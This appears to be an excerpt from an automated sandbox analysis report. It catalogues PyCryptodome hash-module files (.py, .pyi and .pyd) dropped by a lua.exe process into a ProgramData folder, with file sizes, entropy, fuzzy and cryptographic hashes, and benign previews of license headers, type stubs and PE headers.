Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA384Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA384Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA384Hash: .......def new(data: Optional[Buffer] = ...) -> SHA384Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_224.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5437
Entropy (8bit):	4.736624937152666
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkICBSvayNixIVIkWMbiKkHYeu:bQHvHNibk92DYp
MD5:	9D13CC01D96916D6210926831C499BCC
SHA1:	48045B91F37607107405D9596277DFB2EF9E816E
SHA-256:	963FD063570887132FD130BEC57DD4EED67AEA95C051FEA032A5C4B6A7AD59B3
SHA-512:	E36D621F4E464671225AE6B2DDA175CC2386DFB9CF0091C60FDDBEBCB73DECB717B8CF15730029B72DB5546D071EECB90542C65C6F198E618CCA5B9D0595914F
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_224.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	520
Entropy (8bit):	4.905127304462967
Encrypted:	false
SSDEEP:	12:1REYB3vIY3uMRRyLXFL1AGRT7wNMS5JJMsaLBCUMqRyn:1REcT3d3EXFRAcRS+saLBwqy
MD5:	106082C19A52032637C8FD44207217BD
SHA1:	E108338143AC22A7FF8C5807A4B6C03DE4B358E8
SHA-256:	B400AEE4F132A52F16700A3D28AEF0EF4128938A172730635365EE283F8893E8
SHA-512:	4A00120C4C6563A4A4866C3CC3B61F9F78E61227B4AFB3AC7C3035D152F3054BAA8781DCC838C7A61FCC00A19EF970EBE6E8EDD104A73B8AB91A6BE421174CBB
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_224_Hash(object):.. digest_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_224_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self) -> SHA3_224_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_224_Hash: .......digest_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_256.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5437
Entropy (8bit):	4.7397965076628505
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkIC3SvUyeixIVTkWvbiRkHnBv:bQHvDeikkO2MnB
MD5:	C6C2132356CF393F64793EDA67D57DBC
SHA1:	872C37BAD3E7852778E6EFD4FA7880215CDAFB2A
SHA-256:	EF65B76F47EFED7CB86BFCCA32BF2B3015BE5A9DA5C3DFA2C01D00E058D2D357
SHA-512:	08C840D09AE5DB3800371F297F5FDF8182068A2C7A90D6A78603433FEB0701718895187E50765B532410A15161DF02E113677A8E8159C2F50ED32DC7B368EFB3
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_256.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	520
Entropy (8bit):	4.920511919847582
Encrypted:	false
SSDEEP:	12:1REYB3vIY3uBRyLXFL1AGRT7wNC5JJcaLBCU6Ryn:1REcT3mEXFRAc9SaLB+y
MD5:	9B826C58904032EC4700E73A606BDD3A
SHA1:	20FA53E7DC226937AE9504134CC597925CB9F926
SHA-256:	6278824FBEF090CF1D4043DA0A42D8793B5ACA2B99D24B78584D22B9B52C5A22
SHA-512:	6409918F1F442EC8F8348B1D9055DC6DE75CF821E19BCDBEB549735B91B49E94BF41357F494B03A6BAC87F4ECCDC118F06470B8987E98ECF8D055FFFBB462530
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_256_Hash(object):.. digest_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_256_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self) -> SHA3_256_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_256_Hash: .......digest_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_384.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5437
Entropy (8bit):	4.7368084906304215
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkICvSvKyaixIVrkW/biZkHnlL:bQHvtaikkK2UnF
MD5:	57081A81B10CE48A614FAC20FC7ED587
SHA1:	725716896AC2A625D518A43F5EE1AA0080D90EFD
SHA-256:	2467F67B6FE66485DB768F8796E10E677607E7035702B1F416DE10619AFEA2C4
SHA-512:	5791560059D3D457E8166AB843CA9FB6AE2F173F6A3CDB4C8233790867B70FEA3220622E2D3842A1909A4AF86E5673121ECFD33F26B6F47A3F74BF71D648CD41
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_384.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	520
Entropy (8bit):	4.905127304462967
Encrypted:	false
SSDEEP:	12:1REYB3vIY3KHRyLXFL1AGRT7wDA5JHGaLBCs4Ryn:1REcT32EXFRAcVSaLB6y
MD5:	C02024D127CDE75F534B2E3C0531D485
SHA1:	8853F290ECF227CFC54E42F7478423B3C68FD8E6
SHA-256:	5433D17FC106562C2A17196C6AE8C790C222A78CA004CA970D33B48EFCE82FD7
SHA-512:	C539116616550F457002CB38C9D1098B760CC0FF0597CA2542DFE4B693A9B57C0B2A89FBEA419CB9CA5477C5B7CDB382CB7347B503D9C521696607406349C86A
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_384_Hash(object):.. digest_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_384_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self) -> SHA3_384_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_384_Hash: .......digest_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_512.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5440
Entropy (8bit):	4.73986649345207
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkIChSvwyRixIV0xW4bi+kHM6q:bQHvhRibxB2fMJ
MD5:	31A6E0E903A33937DCE1D0E4623A7379
SHA1:	C08E29A96F7356F9A1DC66888975F8F0A8F967C9
SHA-256:	EC44FA30116D33B6D94B9FC8188972A5CFA08AEB692C614CE9087DBF11A0EF01
SHA-512:	B2589756F7C7869595B8C2571E278FF2FEE10AABB928740D69EC23FC89BD42B434EAB8B3FDB4BD34E88143202AF1F4146566B5D78DE3CDFEEFAE266DA1F257C4
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA3_512.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	520
Entropy (8bit):	4.920511919847582
Encrypted:	false
SSDEEP:	12:1REYB3vIY36WHRyLXFL1AGRT7wPWA5J7WGaLBCYW4Ryn:1REcT36WxEXFRAcuWAHWGaLBVWcy
MD5:	18F875851A2E040662A9A37F73AE3CC8
SHA1:	376064CDD90A9F828A1CAC18A09FD29EA12CE076
SHA-256:	35113C4A109D4E7F23BE0015A08FA0C505870C2B0A8A7F06CEF4164494DE1F31
SHA-512:	A768417BAC11232709FE72BC8352985546EA70F513D8C49CE0FC10DE17F8F81D27A9F7B3FC6DE7229D5F6E392AFBD619893B795AF439975BB67CCE317ACD8661
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_512_Hash(object):.. digest_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_512_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self) -> SHA3_512_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_512_Hash: .......digest_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA512.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7924
Entropy (8bit):	4.535718326603204
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkIpywpIreZOTiHSR2c+tTq0iR7IuqNH93aOMqXXVMrynCaK/WxUvxWy:bQHvjyEIqZOzYTq0iONdKUnYqGgRk
MD5:	F7EBB8B3E6EC44133C11F5B75F2AC0CF
SHA1:	4F0230A067019EF92DF555B66D7505BD6229E570
SHA-256:	F4346FEB42803D175A2B4CB2A45FE82882C426A67A64C12AC1D723268D3E7726
SHA-512:	B36AF52C1CD4EC732E1C3A7DB556BCCAF400C298416DE241C763153E784D101F11914D42FF1792513B54EDBBA2297BD49A0B2BEC91AC0AC180151C647F341FE0
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA512.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	644
Entropy (8bit):	4.856785452609936
Encrypted:	false
SSDEEP:	12:1REYB3vIY3eRypRyLu1ApJREVwu5YgR4vORNJt0Ry5Ryn:1REcT3OQEWA1EnTcUNYwy
MD5:	B3762738614E6E1B46387BD0F80C1608
SHA1:	99293AED186FBBBF4D26C3E3A9198F2969596722
SHA-256:	BB0E0DF4F3FFFB4A2B9EFE5B674D7407BBD248678B0BF2A44FF0AA07D247DBDA
SHA-512:	E3B64DDF98F09B098B52AB79D69AF3827A483E4EDA33200B91F87BEB7E37E434D9CB75170635AE509F69D7F328F6B0A9ED258E42410265CE10B263B118C4521A
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA512Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self,.. data: Optional[Buffer],.... truncate: Optional[str]) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA512Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA512Hash: .......def new(data: Optional[Buffer] = ...,.. truncate: Optional[str] = ...) -> SHA512Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHAKE128.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.833986000255611
Encrypted:	false
SSDEEP:	96:M7DqrYJALrYJHdt3EHGuIWHgkIC+zHijI4w+7nC/YEslLH3I:4qrskrs9t3q/IDHiSGC/fOLY
MD5:	3A8DEB1686435A6A07AF062E14DA3380
SHA1:	04083FEF634EB5F6AEEC2541C3EDF6AC47C65507
SHA-256:	6A8B1B89696E246CB6B5DD39425D7BF966231218ECFAC14C8A2C21A429AA79DD
SHA-512:	1DBFE9885030B4CB13BA4E39C2AAFB4821B4D493716FF5E638843396036970EA6F7A16D725FF44ED29F7D7346E17EF5D02B8EE7C9C566E95C81C3DD27E30FC8E
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHAKE128.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	450
Entropy (8bit):	4.960253129735369
Encrypted:	false
SSDEEP:	12:1REYB3vIY3wHVXFL1ApJR4QwEh72CX5BgR48OR42:1REcT36XFRA1Nh71m7U1
MD5:	1D2E126B0EA263236F02A5B62DA5903D
SHA1:	BCA2F2DC2A69380180FFEACDB276A6CA7FFD2036
SHA-256:	FCF71DFFB424435A46138D3B0377F30E1DB2AA318600D6DAE7B123DF848D3EA2
SHA-512:	4B806AABF25A8D9A705E282EB11EE73500BC1CF71A6EBE59A35A732DE1F5CA0D960BAC124059EF85AF9A6E5A2023895D7CDB195A884A8161275D9BE237F0A518
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE128_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE128_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE128_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE128_XOF: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHAKE256.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.837977112422358
Encrypted:	false
SSDEEP:	96:M7DqrYJALrYJHdt3EHGuIWHgkICHzgijI7+7nC/Ywsl3nbI:4qrskrs9t3q/IegiWGC/fO3M
MD5:	ADC62DE0F5593DACF0AAB889B99DDA8D
SHA1:	BB327B4A990BF9B16787640BEE36FCBB5B86C521
SHA-256:	4B4F8211AB0C06069525392D5022B1E730DD967C2D22AE65180E74CBE036ECBB
SHA-512:	D8C55BC62F36755C2B0D534661DB6A650F3425E461D0618F86DDCBD4B27DAAD13C8D17C6B5FDC97B850089DCEDA5C145C7217C2B98231DC9479AA805D9FC3129
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHAKE256.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	450
Entropy (8bit):	4.960253129735369
Encrypted:	false
SSDEEP:	12:1REYB3vIY3gHVXFL1ApJR4QwIh72CX5BgR4gOR4K:1REcT3g1XFRA1Rh71m/UZ
MD5:	7A030ACE3463C718EAA115B061D5E0CE
SHA1:	0525426CE1A9ABE207F53E953EA8E272E423D512
SHA-256:	5FF0C2256DD9F35EB7BF58D07EDC5A27E73173221079006B1AF95D0B114863A4
SHA-512:	230109D6EAC483A3DFA0E268477D860AF0DB445D89EF5E39B32A9833CC85E8FBD610C88993CABB097A60630620539191A6AC9742DAD3A7FA141600C7AC4603D5
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE256_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE256_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE256_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE256_XOF: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.219822227898795
Encrypted:	false
SSDEEP:	192:s05p7mr3Tutd9Pwv2e42bF7i+V2rQnjt1wmg9jNVmp23XDLUk:OD6tTephi+AojO9j6QHUk
MD5:	07143235F8525D6F0C377145AB9B0A55
SHA1:	1C93F3219D91971D125606F374914365E4DDC145
SHA-256:	732C3BC17111705C3B4DEA4E9CAF002F7E143406B858C2F77F8C231512544E56
SHA-512:	992A3AFA7F80F8E22ECD6D7B52B2D24D179DA67FABBCC19C89F64841B9B7A2326C85B44BA322A2C7D837EC301A6AF2CC1CEBB7B2A7A15A9FD2A77B8EEB7B12A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...r.!`.........." ................T.....................................................`..........................................8......\|9..d....`.......P..@............p..$....2...............................2..8............0...............................text............................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..$....p.......6..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.17157428322592
Encrypted:	false
SSDEEP:	192:405p7mr3Tutd9Pwv2aKbxdcgatX1Wmkf09L9kDLUhX:yD6tTZgtX15k+YU
MD5:	9098B9C8340047C6434825E18826CC18
SHA1:	85DDE191F6549ACA0813D8A723D39B83C61002DB
SHA-256:	825039711C334E169432A482F8B71AE735D7A1BD56552E501F6F3ECA87CF272E
SHA-512:	DEFC6852291B568793A48124184342272F4BC424F88DE82A35335D5596DFACC93A52AFC33C43337E4CEB800C5BD998493A7BA7F52C02A6027A4434D7E608FCAE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...r.!`.........." ................T.....................................................`..........................................8.......9..d....`.......P..@............p..$....2...............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD2.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.171387298792714
Encrypted:	false
SSDEEP:	384:EjJzPAI2p3C2p+EhKnLg9yH8puzoFaPERIQA7qYU:gITp3pp+EhmLg9yH8puzoFaPERIQX
MD5:	BD80A82536F46D9EF6EF580FAFBF4035
SHA1:	7CC4E50851CB7FCC1508AAE4EC67A9385A66167A
SHA-256:	0BB77AE7639B5358CF99DE21002AE79C67DB9A28CBF08A85414DED9FCDDFB077
SHA-512:	07A6D7C0BAB9FBB6336F948452BF8B91E4B54B2B5F953CDDC0CEEBF171635B226DF1571B80B3CAC10645C2A9E1B0F6E453C456347F1A525B57C047254C904880
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...l.!`.........." ................T.....................................................`..........................................9.......9..d....`.......P..(............p..$....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...x....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD4.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.089720168158249
Encrypted:	false
SSDEEP:	192:cE4+jfKIb3gudUPpwVp1sAD7I/9hAkzTOre5QDLU+db:NjJzPQwVp1sAD7Kvpvv5uUob
MD5:	2C8D415E6D26854D288CDE7902216E89
SHA1:	5545E127AF8557B84366A175575DFE92C29777D5
SHA-256:	F664DB41B65E8B5460F91F0DFD2CBF25A86D985D0E03F75E23B6A0C17A68EF07
SHA-512:	941E346049C2ECC914B28EC6EAEAC93A6024A593A62204FA50D851190A0C4F000CC7E26DC10147B49E7D64828477301A238D45C91C2D650FFAF4E28F46B6ED92
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...m.!`.........." ................T.....................................................`..........................................8.......8..d....`.......P..(............p..$....1...............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD5.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.4331159004042915
Encrypted:	false
SSDEEP:	192:79FZ/KFjb3OuTPU84At56BTBvzcuiDSjeoGCQUPTrLFDLUEPLdN:ZwztA8Tt5OwuiDSyoGZmXdUEPB
MD5:	2F4C07B5FC3C6245B0E1269C0D1A5A97
SHA1:	26EA9BAABADF63E5A44F3B606139F249BD120B99
SHA-256:	EFB961372F6CE102A9836B63038AE1385B408EF8DCF2DE7238B2403A6E987B27
SHA-512:	21E1CCBF238FD59C1CE80543A8F21858AE6E15AD1E8536A0144EC06791CD2488822AE87D84E331E9135142C76506E68FAD7DBB4B26428FF3AC0D43F49E8FCC92
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...m.!`.........." ..... ..........T.....................................................`.........................................P8...... 9..d....`.......P..X............p..$....1...............................1..8............0...............................text............ .................. ..`.rdata..p....0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.100861223598239
Encrypted:	false
SSDEEP:	192:h05p7mr3Tutd9Pgv239k9UgPKsVQJuJk7+rDLU8:hD6tD3G9tPKsVQJuDDU
MD5:	13AC3BDF6EF8E084C71570D0A91712E1
SHA1:	3B8E64C60FF75EF4915C9428C7C2C6C9056E2EEA
SHA-256:	D253DBE9E7BF4ECFC80210B312DC9889BEED5D428518058E98639F44585FE030
SHA-512:	6AB13AE675742D255D9EE458EAC749B12173999BE4923E6965D94FC2226F39456B047A2FDF682F99ED5F5967DA7F58252808826EABD587306D7B7B10F7A495E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...q.!`.........." ......... ......T.....................................................`.........................................p9......H:..d....`.......P...............p..$...@3..............................`3..8............0...............................text...X........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA1.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.658414885758833
Encrypted:	false
SSDEEP:	192:vj51JwTx7uuj/krY1ZLhGZo2R1J+0eDPSgkNZuOdlptvTLZB5b+vDLUE+Ea:CxQr89hTOJ+0QPSfu6rzZ+/UE+
MD5:	D2EF20FE88C483DC2588C03876058AFD
SHA1:	86A7A9E71DF94FEC73DD90A9A4CF5B7901CE622D
SHA-256:	6CC9CFA3C9739B545808E814A661B5B54E9127B057CE503024E515648B7A4A33
